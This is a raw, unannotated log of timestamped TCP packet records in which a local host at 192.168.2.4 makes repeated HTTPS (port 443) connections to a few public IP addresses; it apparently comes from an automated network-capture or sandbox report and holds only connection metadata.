                                                                                                                                      Nov 29, 2024 23:10:06.205219030 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.525979996 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526027918 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526074886 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526118040 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.526129007 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:06.526308060 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.527321100 CET49744443192.168.2.4104.21.82.93
                                                                                                                                      Nov 29, 2024 23:10:06.527328968 CET44349744104.21.82.93192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:07.944447041 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:07.944489002 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:07.944575071 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:07.945758104 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:07.945772886 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:09.326200008 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:09.326265097 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:09.327625990 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:09.327640057 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:09.327841997 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:09.380947113 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:09.384248972 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:09.384263992 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:09.384308100 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.160820007 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.160883904 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.161201000 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.162010908 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.162029028 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.162041903 CET49746443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.162045956 CET44349746172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.301100969 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.301126003 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:10.301198006 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.301605940 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:10.301614046 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:11.518254995 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:11.518318892 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:11.520968914 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:11.520976067 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:11.521198034 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:11.522402048 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:11.522440910 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:11.522466898 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322273970 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322318077 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322360039 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322390079 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322412014 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.322419882 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322429895 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.322446108 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.322470903 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.322482109 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.338337898 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.338433027 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.338484049 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.338490963 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.340543032 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.346579075 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.391973019 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.442208052 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.485729933 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.485735893 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513595104 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513659954 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.513665915 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513758898 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513803959 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.513818026 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513828039 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.513828993 CET49747443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.513834953 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.513839960 CET44349747172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.594337940 CET49740443192.168.2.4142.250.181.100
                                                                                                                                      Nov 29, 2024 23:10:12.691850901 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.691880941 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:12.691945076 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.693383932 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:12.693396091 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:13.997992992 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:13.998058081 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:14.001347065 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:14.001355886 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.001555920 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.003174067 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:14.003289938 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:14.003329039 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.003509045 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:14.003515005 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.039196968 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:14.039215088 CET4434974920.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:14.041683912 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:14.045629978 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:14.045639992 CET4434974920.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.116744995 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.116822958 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.116873026 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:15.121383905 CET49748443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:15.121398926 CET44349748172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.243508101 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:15.243527889 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.243590117 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:15.244054079 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:15.244065046 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.830281019 CET4434974920.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.830390930 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:15.835870981 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:15.835876942 CET4434974920.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.836080074 CET4434974920.109.210.53192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:15.884291887 CET49749443192.168.2.420.109.210.53
                                                                                                                                      Nov 29, 2024 23:10:16.445204020 CET49751443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.445225000 CET44349751172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:16.445316076 CET49751443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.447161913 CET49751443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.447174072 CET44349751172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:16.462277889 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:16.465151072 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.465151072 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.465163946 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:16.465357065 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:16.466713905 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.466713905 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:16.466739893 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:17.434638977 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:17.434716940 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:17.434777021 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:17.434936047 CET49750443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:17.434952974 CET44349750172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:17.647356033 CET49753443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:17.647382021 CET44349753172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:17.647475004 CET49753443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:25.930135965 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:25.970957994 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:25.971467972 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:25.971522093 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:25.971544027 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.115106106 CET44349760172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.115181923 CET44349760172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.115246058 CET49760443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.117863894 CET49760443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.117911100 CET44349760172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.135970116 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.135998964 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.136059999 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.136344910 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.136357069 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517200947 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517296076 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.517379999 CET49762443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.522341013 CET49762443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.522372007 CET44349762172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805205107 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805278063 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805358887 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805545092 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805557013 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.805579901 CET49763443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.805584908 CET44349763172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.883944035 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.883970022 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.884120941 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.884388924 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.884399891 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.886394024 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886411905 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:26.886466026 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886766911 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:26.886776924 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.398808002 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.399010897 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.400084972 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.400093079 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.400291920 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:27.408749104 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.408778906 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:27.408807993 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.118835926 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.118931055 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.120105028 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.120111942 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.120311975 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.121571064 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.121613979 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.121632099 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.155999899 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.156075954 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.157064915 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.157074928 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.157269001 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.163011074 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163155079 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163180113 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.163260937 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.163268089 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257510900 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257585049 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257747889 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257819891 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257829905 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.257842064 CET49764443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.257846117 CET44349764172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.798841953 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.798894882 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799006939 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799041033 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799074888 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.799192905 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.799192905 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.799204111 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.801685095 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.807183027 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815485001 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815589905 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815742016 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.815752029 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.815797091 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.823846102 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.872208118 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.918832064 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.972716093 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:28.972722054 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.990878105 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.990950108 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:28.991108894 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031481981 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031490088 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.031501055 CET49766443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.031505108 CET44349766172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405507088 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405589104 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.405774117 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.405951023 CET49765443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.405967951 CET44349765172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.723861933 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.723901033 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.723978043 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.725240946 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.725254059 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.849040985 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849086046 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:29.849153042 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849529982 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:29.849545002 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.938450098 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.938533068 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.939815998 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.939831018 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.940028906 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:30.941154957 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.941246033 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:30.941251040 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.156232119 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.156342983 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.157423973 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.157437086 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.157638073 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.158807993 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.158910036 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.158945084 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:31.159806013 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:31.159815073 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057749987 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057856083 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.057904005 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.057965040 CET49767443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:32.057980061 CET44349767172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200587988 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200666904 CET44349768172.67.156.217192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:32.200711012 CET49768443192.168.2.4172.67.156.217
                                                                                                                                      Nov 29, 2024 23:10:58.920059919 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.920108080 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.962820053 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962836027 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962904930 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.962912083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.962956905 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.984518051 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984534025 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984607935 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:58.984615088 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:58.984659910 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.003346920 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003364086 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003489971 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.003495932 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.003535986 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.110440969 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110455990 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110536098 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.110546112 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.110586882 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.130336046 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130350113 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130407095 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.130414009 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.130454063 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.147623062 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147638083 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147718906 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.147726059 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.147762060 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.159104109 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159117937 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159296036 CET49777443192.168.2.413.107.246.63
                                                                                                                                      Nov 29, 2024 23:10:59.159301996 CET4434977713.107.246.63192.168.2.4
                                                                                                                                      Nov 29, 2024 23:10:59.159347057 CET49777443192.168.2.413.107.246.63
